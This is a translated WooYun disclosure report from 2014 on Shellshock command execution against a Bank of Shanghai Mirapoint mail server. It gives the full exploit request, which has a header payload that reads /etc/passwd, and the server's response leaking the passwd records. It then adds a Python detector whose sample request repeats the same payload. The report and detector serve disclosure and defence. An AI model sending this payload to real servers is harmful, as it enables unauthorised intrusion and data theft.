
Vulnerability summary

Defect ID: wooyun-2014-078918

Title: Command execution on an important internal system of Bank of Shanghai

Vendor: bankofshanghai.com

Author: 拖鞋王子

Submitted: 2014-10-11 00:18

Fixed: 2014-11-25 00:20

Published: 2014-11-25 00:20

Vulnerability type: System/service patch not applied in time

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org. For questions or help, contact [email protected]

Tags:


Vulnerability details

Disclosure status:

2014-10-11: Details reported to the vendor; awaiting vendor handling
2014-10-15: Vendor confirmed; details disclosed to the vendor only
2014-10-25: Details disclosed to core white hats and relevant domain experts
2014-11-04: Details disclosed to ordinary white hats
2014-11-14: Details disclosed to intern white hats
2014-11-25: Details disclosed to the public

Brief description:

A quick look with the trusty tool today showed that Bank of Shanghai's important internal system still has command execution.

Detailed description:

GET /cgi-bin/madmin.cgi HTTP/1.1
Host: mail.bankofshanghai.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
X-Test: () { :;};a=`/bin/cat /etc/passwd`;echo $a
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en,zh-CN;q=0.8,zh;q=0.6,ko;q=0.4,zh-TW;q=0.2,th;q=0.2,ja;q=0.2

Proof of vulnerability:

HTTP/1.1 200 OK
Date: Fri, 10 Oct 2014 15:39:23 GMT
Server: Mirapoint/4.3.4-GA
root: x:0:0:root:/root:/bin/bash
bin: x:1:1:bin:/bin:/sbin/nologin
daemon: x:2:2:daemon:/sbin:/sbin/nologin
adm: x:3:4:adm:/var/adm:/sbin/nologin
lp: x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync: x:5:0:sync:/sbin:/bin/sync
shutdown: x:6:0:shutdown:/sbin:/sbin/shutdown
halt: x:7:0:halt:/sbin:/sbin/halt
mail: x:8:12:mail:/var/spool/mail:/sbin/nologin
news: x:9:13:news:/etc/news:
uucp: x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator: x:11:0:operator:/root:/sbin/nologin
games: x:12:100:games:/usr/games:/sbin/nologin
gopher: x:13:30:gopher:/var/gopher:/sbin/nologin
ftp: x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody: x:99:99:Nobody:/:/sbin/nologin
vcsa: x:69:69:virtual console memory owner:/dev:/sbin/nologin
monit: x:100:101:monit daemon:/var/lib/monit:/bin/sh
pcap: x:77:77::/var/arpwatch:/sbin/nologin
nscd: x:28:28:NSCD Daemon:/:/sbin/nologin
ntp: x:38:38::/etc/ntp:/sbin/nologin
dbus: x:81:81:System message bus:/:/sbin/nologin
rpc: x:32:32:Portmapper RPC user:/:/sbin/nologin
named: x:25:25:Named:/var/named:/sbin/nologin
sshd: x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
memcached: x:101:102:Memcached daemon:/var/run/memcached:/sbin/nologin
oprofile: x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
haldaemon: x:68:68:HAL daemon:/:/sbin/nologin
rpcuser: x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody: x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
man: x:500:15::/home/man:/bin/bash
mira: x:70:70::/home/mira:/bin/bash
netdump: x:34:34::/home/netdump:/bin/bash
cyrus: x:70:70::/home/cyrus:/bin/bash
Cache-Control: no-cache
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=GB2312
<html>
<head>
<meta http-equiv='Content-Type' content='text/html; charset=GB2312'>
<META HTTP-EQUIV='Expires' CONTENT='Tue, 04 Dec 1993 21:29:02 GMT'>
<META HTTP-EQUIV='Pragma' CONTENT='no-cache'>
<LINK REL=STYLESHEET TYPE='text/css' HREF='/extras/css/admin.css'>
<LINK REL='SHORTCUT ICON' href='/sa/Mira_bookmark.ico'>
<title>Óʼþ·þÎñÆ÷µÇ¼</title>
<script language=javascript src='/sa/sa.js'>
</script>
</head>
<body class='genLogin' onload='document.forms[0].elements[0].focus()' text='#000000' bgcolor='#efefef' leftmargin='0' topmargin='0'>
<center>
<table border='0' cellpadding='8' cellspacing='0' background='/sa/globe_full.gif' width=800>
<tr>
<td width='230' align=center valign=bottom>&nbsp;</td>
<td width='400' height='108' align=center valign=bottom>&nbsp;</td>
<td align=center valign=bottom>&nbsp;</td>
</tr>
<tr align='left'>
<td colspan='3' valign=bottom>
<table width='545' border='0' cellspacing='0' cellpadding='0'>
<tr>
<td width='201'>&nbsp;</td>
<td width='338'>
<table width='334' height='81' border='0' cellpadding='0' cellspacing='0' background='/sa/loginbanner.gif'>
<tr><td>&nbsp;</td></tr>
</table>
</td>
</tr>
<tr>
<td colspan=2 nowrap align=right>
<font class='genLoginTitle' color='#f5873c'><strong>Óʼþ·þÎñÆ÷µÇ¼</strong></font>
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td width='230' align=center>&nbsp;</td>
<td align='left' colspan='2'>
<form ACTION='/cgi-bin/madmin.cgi/sa/login.html' NAME='myform' AutoComplete='off'
METHOD='POST' ENCTYPE='application/x-www-form-urlencoded' onSubmit='checkjavascript(myform.browserjs);'>
<table cellspacing=0 cellpadding=0 width=160 bgcolor=#ffffff border=0>
<tr>
<td colspan='2' rowspan='2' align='left' valign='top' bgcolor='efefef'><img src='/sa/lefttopgrey.gif' width='12' height='12'></td>
<td height=1 valign=top bgcolor='#cccccc'><img height=1 alt='' src='/sa/ts.gif' width=1 border=0></td>
<td colspan='2' rowspan='2' align='right' valign='top' bgcolor='efefef'><img src='/sa/righttopgrey.gif' width='12' height='12'></td>
</tr>
<tr>
<td height=11 valign=top bgcolor='#ffffff'></td>
</tr>
<tr>
<td width=1 bgcolor=#cccccc><img height=1 alt='' src='/sa/ts.gif' width=1 border=0></td>
<td width=11 bgcolor=#ffffff>&nbsp;</td>
<td align='center' valign=top>
<table cellspacing=0 border=0>
<tr>
<td colspan='2' align='right' nowrap>
<font class=text1>±ê×¼Á¬½Ó | <a href='https://mail.bankofshanghai.com/cgi-bin/madmin.cgi/sa?locale=zs_CN.utf-8L4_3'>°²È«Á¬½Ó</a></font>
</td>
</tr>
<tr>
<td align='right' nowrap>
Óû§£º
</td>
<td>
<input type='text' size='20' name='user' value='' tabindex=1 onkeypress='checkWhich(event, login)'>
</td>
</tr>
<tr>
<td align='right' nowrap>
ÃÜÂ룺
</td>
<td>
<input type='password' size='20' name='password' value='' tabindex=2 onkeypress='checkWhich(event, login)'>
</td>
</tr>
<tr>
<td>
&nbsp;
</td>
<td align='right'>
<input type='submit' name='login' value='怬' tabindex=3 class='btn'>
</td>
</tr>
</table>
</td>
<td width=11 bgcolor=#ffffff><img height=1 alt='' src='/sa/ts.gif' width=1 border=0></td>
<td width=1 bgcolor=#cccccc></td>
</tr>
<tr>
<td colspan='2' rowspan='2' align='left' valign='top' bgcolor='efefef'><img src='/sa/leftbotgrey.gif' width='12' height='12'></td>
<td height='11' valign=top bgcolor='#ffffff'><img height=1 alt='' src='/sa/ts.gif' width=1 border=0></td>
<td colspan='2' rowspan='2' align='right' valign='top' bgcolor='efefef'><img src='/sa/rightbotgrey.gif' width='12' height='12'></td>
</tr>
<tr>
<td height='1' valign=top bgcolor='#cccccc'></td>
</tr>
</table>
<input type='hidden' name='timestamp' value='1412955563'>
<input type='hidden' name='locale' value='zs_CN.utf-8L4_3'>
<input type='hidden' name='browserjs' value='false'>
<input type='hidden' name='mutual_lock' value=''>
</form>
</td>
</tr>
<tr>
<td height='65' colspan='3'>
&nbsp;
</td>
</tr>
<tr>
<td>&nbsp;</td>
<td colspan='2' align='left'>
<font class=text1> &nbsp;</font>
</td>
</tr>
<tr>
<td>&nbsp;</td>
<td colspan='2' align='left'>

<a href='/cgi-bin/madmin.cgi/sa/login.html?locale=en_US.ISO_8859-1'>
<nobr>Ó¢Óï</nobr></a> -
<a href='/cgi-bin/madmin.cgi/sa/login.html?locale=ja_JP.utf-8'>
<nobr>ÈÕÓï</nobr></a> -
<a name='/cgi-bin/madmin.cgi/sa/login.html?locale=zs_CN.utf-8L4_3'>
<nobr>¼òÌåÖÐÎÄ</nobr></a>
</td>
</tr>
<tr>
<td>&nbsp;</td>
<td colspan='2' align='left'>
<font class=text1>Copyright &copy; 1998-2011 <a href='http://www.mirapoint.com' target='_blank'>Mirapoint Software</a>, Inc.</font>
</td>
</tr>
</table>
</center>
</body>
</html>
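The request under "Detailed description" carries the bash function-export prefix `() {` in a header value, and the response above shows /etc/passwd records echoed back as HTTP headers because the CGI handler copied the header into the environment. As an added example, not part of the WooYun report or of Mirapoint's code, here is a small Python detector of the kind a WAF or proxy-log pipeline could run: it flags any request header whose value starts with that prefix, notes whether the path goes through a CGI handler, and counts passwd-shaped lines in response headers. All function names are assumptions; the sample messages are constructed, with the suspicious request reusing the header shape shown in the report.

```python
import re
from typing import Dict, List, Tuple

# Bash treats an environment variable whose value starts with "() {" as an
# exported function definition; affected bash builds also run whatever follows
# the closing brace. CGI servers copy request headers into the environment, so
# this prefix in any header value is the signature to flag.
SHELLSHOCK_PREFIX = re.compile(r"^\s*\(\)\s*\{")

# An /etc/passwd record emitted as an HTTP header reads like
# "root: x:0:0:root:/root:/bin/bash": the login name became the header name.
PASSWD_AS_HEADER = re.compile(r"^[A-Za-z_][\w.-]*:\s*x:\d+:\d+:[^:\n]*:[^:\n]*:")


def split_head(raw: str) -> List[str]:
    """Return the non-empty lines of the header block of a raw HTTP message."""
    text = raw.replace("\r\n", "\n")
    head = text.split("\n\n", 1)[0]
    return [ln for ln in head.split("\n") if ln.strip()]


def parse_request(raw: str) -> Tuple[str, Dict[str, str]]:
    """Split a raw request into (request_line, headers); names are lower-cased."""
    lines = split_head(raw)
    headers: Dict[str, str] = {}
    for ln in lines[1:]:
        name, sep, value = ln.partition(":")
        if sep:  # lines without a colon are malformed, not headers
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def find_shellshock_headers(raw_request: str) -> List[Tuple[str, str]]:
    """(name, value) pairs whose value starts with the bash function prefix."""
    _, headers = parse_request(raw_request)
    return [(n, v) for n, v in headers.items() if SHELLSHOCK_PREFIX.match(v)]


def targets_cgi(raw_request: str) -> bool:
    """True when the request path goes through a CGI handler (/cgi-bin/)."""
    request_line, _ = parse_request(raw_request)
    parts = request_line.split()
    return len(parts) >= 2 and "/cgi-bin/" in parts[1]


def count_passwd_leak_lines(raw_response: str) -> int:
    """Number of header lines in a response that look like /etc/passwd records."""
    return sum(1 for ln in split_head(raw_response) if PASSWD_AS_HEADER.match(ln))


def assess(raw_request: str, raw_response: str = "") -> Dict[str, object]:
    """Combine the checks into one verdict for an alert or a WAF log entry."""
    hits = find_shellshock_headers(raw_request)
    leaked = count_passwd_leak_lines(raw_response) if raw_response else 0
    return {
        "shellshock_headers": [n for n, _ in hits],
        "cgi_target": targets_cgi(raw_request),
        "passwd_lines_in_response": leaked,
        "alert": bool(hits) or leaked > 0,
    }


# Constructed samples: the suspicious request and the leaky response follow the
# shapes shown in the report; the benign request is made up for contrast.
SUSPICIOUS_REQUEST = (
    "GET /cgi-bin/madmin.cgi HTTP/1.1\r\n"
    "Host: mail.bankofshanghai.com\r\n"
    "X-Test: () { :;};a=`/bin/cat /etc/passwd`;echo $a\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "\r\n"
)
BENIGN_REQUEST = (
    "GET /cgi-bin/madmin.cgi HTTP/1.1\r\n"
    "Host: mail.bankofshanghai.com\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Accept: text/html\r\n"
    "\r\n"
)
LEAKY_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Mirapoint/4.3.4-GA\r\n"
    "root: x:0:0:root:/root:/bin/bash\r\n"
    "bin: x:1:1:bin:/bin:/sbin/nologin\r\n"
    "Content-Type: text/html; charset=GB2312\r\n"
    "\r\n"
    "<html></html>"
)

if __name__ == "__main__":
    print(assess(SUSPICIOUS_REQUEST, LEAKY_RESPONSE))
    print(assess(BENIGN_REQUEST))
```

The request-side check is what matters for blocking: the `() {` prefix has no legitimate use in a browser header, so matching it on any header value (not only User-Agent or Cookie, since CGI exports every header) gives a low-noise rule. The response-side count is a second signal for egress monitoring, because a successful run of this payload shows up as passwd records in the header block before the normal Content-Type line, exactly as in the proof above.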

Remediation:

Copyright notice: when reposting, please credit the source: 拖鞋王子@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 9

Confirmed: 2014-10-15 17:40

Vendor reply:

Latest status:

None yet